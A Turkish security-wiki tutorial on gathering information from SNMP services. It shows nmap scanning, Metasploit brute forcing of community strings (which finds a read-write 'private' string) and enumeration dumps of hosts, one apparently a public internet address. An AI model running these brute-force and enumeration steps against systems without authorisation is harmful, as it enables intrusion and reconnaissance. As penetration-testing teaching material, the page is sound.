SNMP Üzerinden Bilgi Toplama

BGA Security Wiki sitesinden
Şuraya atla: kullan, ara

Amaç: SNMP servisi açık olan sistemlerden bilgi toplama

Kullanılan Araçlar:

  • Nmap
  • Metasploit
  • Solarwinds
  • Snmpenum

Adımlar:

1. Adım: SNMP UDP 161 portunu kullandığı için hedef sistemde öncelikle bu portun açık olup olmadığını anlamamız gerekiyor. Bunun için nmap’i bu porta sürüm tarama parametresi (-sV) ile çalıştırıyoruz.

sh-3.2# nmap 192.168.5.9 -p 161 -sU -sV 
Starting Nmap 6.01 ( http://nmap.org ) at 2012-12-01 15:48 EET 
Nmap scan report for (192.168.5.9)
Host is up (0.29s latency). 
PORT STATE SERVICE VERSION 
161/udp open snmp SNMPv1 server (public) 
Service Info: Host: r3.ca.smt 
Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . 
Nmap done: 1 IP address (1 host up) scanned in 4.57 seconds

2. Adım: Metasploit ile SNMP protokolünde kullanılan haberleşme kelimesini (community word) tespit etmek için brute force işlemi yapalım;

root@bt:~# msfconsole msf > use auxiliary/scanner/snmp/snmp_login 
msf auxiliary(snmp_login) > show options 
Module options (auxiliary/scanner/snmp/snmp_login): 
Name                   Current Setting              Required           Description                                        
----                  ---------------               --------            ----------- 
BATCHSIZE             256                              yes                   The number of hosts to probe in each set 
BLANK_PASSWORDS      true                            no                    Try blank passwords for all users 
BRUTEFORCE_SPEED      5                                yes                   How fast to bruteforce, from 0 to 5 
CHOST                                                no                     The local client address 
PASSWORD                                                  no                     The password to test 
PASS_FILE /opt/metasploit/msf3/data/wordlists/snmp_default_pass.txt    no File containing communities, one per line 
RHOSTS                                               yes                  The target address range or CIDR identifier 
RPORT                  161                            yes                       The target port 
STOP_ON_SUCCESS           false                       yes               Stop guessing when a credential works for a host 
THREADS                     1                         yes                  The number of concurrent threads 
USER_AS_PASS          true                           no              Try the username as the password for all users 
VERBOSE                     true                            yes            Whether to print output for all attempts 
msf auxiliary(snmp_login) > set RHOSTS 192.168.5.9 
RHOSTS => 192.168.5.9
msf auxiliary(snmp_login) > exploit 
[*] :161SNMP - [001/118] - 192.168.5.9:161 - SNMP - Trying public... 
[*] :161SNMP - [002/118] - 192.168.5.9:161 - SNMP - Trying private... 
[*] :161SNMP - [003/118] - 192.168.5.9:161 - SNMP - Trying 0... 
[*] :161SNMP - [011/118] - 192.168.5.9:161 - SNMP - Trying CISCO... 
[+] SNMP: 192.168.5.9 community string: 'public' info: 'APC Web/SNMP Management Card (MB:v3.6.8 PF:v2.6.4 PN:apc_hw02_aos_264.bin AF1:v2.6.1 AN1:apc_hw02_sumx_261.bin MN:AP9617          
HR:A10 SN: ZA0525013061 MD:06/16/2005) (Embedded PowerNet SNMP Agent SW v2.2 compatible)' 
[*] Validating scan results from 1 hosts... 
[*] Host 192.168.5.9 provides READ-WRITE access with community 'private' 
[*] Scanned 1 of 1 hosts (100% complete) 
[*] Auxiliary module execution completed msf auxiliary(snmp_login) >

3. Adım: Community word değerini de bildigimiz snmp servisini exploit edip uzak sistem hakkında bilgi toplayalım. Bunun için snmp_enum modülünü kullanıyoruz.

msf auxiliary(snmp_login) > use auxiliary/scanner/snmp/snmp_enum 
msf auxiliary(snmp_enum) > set RHOSTS 192.168.5.6 
RHOSTS => 192.168.5.6 
msf auxiliary(snmp_enum) > exploit 
[*] 192.168.5.6, Connected. 
[*] System information
Host IP : 192.168.5.6 
Hostname : r3.ca.smt 
Description : APC Web/SNMP Management Card (MB:v3.6.8 PF:v2.6.4 PN:apc_hw02_aos_264.bin AF1:v2.6.1 AN1:apc_hw02_sumx_261.bin MN:AP9617 HR:A10 SN: ZA0525013061 MD:06/16/2005 (Embedded PowerNet SNMP Agent SW v2.2 compatible) Contact : r3ops@yandex.com 
Location : smt 
Uptime snmp : - 
Uptime system : 112 days, 07:03:31.22 
System date : - 
Network information:
IP forwarding enabled : no 
Default TTL : 64 
TCP segments received : 22873 
TCP segments sent : 18301 
TCP segments retrans : 741 
Input datagrams : 807289 
Delivered datagrams : 807281 
Output datagrams : 805841 
Network interfaces: 
Interface : [ unknown ] lance 
Id : 1 
Mac Address : 00:c0:b7:77:1f:95 
Type : unknown 
Speed : 100 Mbps 
MTU : 1500 
In octets : 77795455 
Out octets : 77176045
Network IP: 
Id       IP Address              Netmask                    Broadcast                                                          
1       192.168.5.6             255.255.255.248              1 
Routing information: 
Destination                     Next hop           Mask              Metric                                              
0.0.0.0                            192.168.5.1      0.0.0.0            -1
TCP connections and listening ports: 
Local address             Local port           Remote address    Remote port    State                  
0.0.0.0 21                    0.0.0.0 0              unknown                                                                   
0.0.0.0 23                    0.0.0.0 0              unknown                                                                 
0.0.0.0 80                    0.0.0.0 0              unknown                                                             
Listening UDP ports:    
Local address             Local port 
0.0.0.0                         33281 
0.0.0.0                         54031 
0.0.0.0                         42389 
0.0.0.0                         161 
0.0.0.0                         53962 
192.168.5.6                 9950 
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed 
msf auxiliary(snmp_enum) >

4. Adım: Solarwinds Network IP Browser aracı ile grafik arayüzünden uzak sistem bilgilerine erişilebilir.

Snmp.png


Snmp2.png



5. Adım: Snmpenum aracı ile uzak sistem hakkında bilgi toplamak;

root@bt:/pentest/enumeration/snmp/snmpenum# ./snmpenum.pl 111.1.19.23 public linux.txt 
---------------------------------------- 
UPTIME
---------------------------------------- 
18 minutes, 22.57
---------------------------------------- 
HOSTNAME 
---------------------------------------- 
ZhejiangYidong-MXZ87.hezuo.ppvod.snmp-iptables 
---------------------------------------- 
RUNNING SOFTWARE PATHS
---------------------------------------- 
init[3]
migration/0 
ksoftirqd/0
---------------------------------------- 
RUNNING PROCESSES 
---------------------------------------- 
init migration/0 
ksoftirqd/0 
watchdog/0 
migration/1
----------------------------------------
MOUNTPOINTS 
---------------------------------------- 
Memory Buffers 
Real Memory 
Swap Space 
/
/sys 
/boot 
/home/pplive/openservice/service/0 
/home/pplive/openservice/service/1 
---------------------------------------- 
SYSTEM INFO
---------------------------------------- 
Linux ZhejiangYidong-MXZ87.hezuo.ppvod.snmp-iptables 2.6.18-92.el5PAE #1 SMP Tue Apr 29 13:31:02 EDT 2008 i686
---------------------------------------- 
LISTENING UDP PORTS 
---------------------------------------- 
161 514
---------------------------------------- 
LISTENING TCP PORTS
---------------------------------------- 
21 
80 
81 
82 
8011 
8080 
8888 
10050 
19765